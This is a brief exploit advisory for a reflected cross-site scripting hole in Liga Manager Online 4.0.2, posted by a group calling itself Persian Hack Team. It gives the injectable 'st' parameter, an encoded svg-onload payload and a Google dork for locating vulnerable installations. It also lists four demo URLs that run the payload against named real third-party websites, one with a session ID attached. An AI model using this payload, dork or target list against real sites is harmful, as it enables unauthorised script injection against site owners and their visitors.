Liga Manager Online 4.0.2 Cross Site Scripting
Posted on 29 January 2016
###################### # Exploit Title : LMO 4.0.2 Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.liga-manager-online.de/homepage/ # Google Dork : "LMO 4.0.2" inurl:"st=" # Date: 2016/01/28 # Version = 4.0.2 ###################### # PoC: st=[XSS] # Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team # Demo : #http://www.wildeligabremen.com/LMO/lmo.php?action=results&file=noname.l98&st=13%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.bb-american-dart.de/lmo/lmo.php?action=results&file=C-Liga.l98&st=14%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.fortuna-futsal.de/lmo2/lmo.php?action=results&file=Niederrheinliga%202015-2016.l98&st=4%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.uslaval.it/liga/lmo.php?action=results&file=La%20Val.l98&st=3%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&PHPSESSID=83b06c0e762470bcd58c8fac2ce9a19d # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################
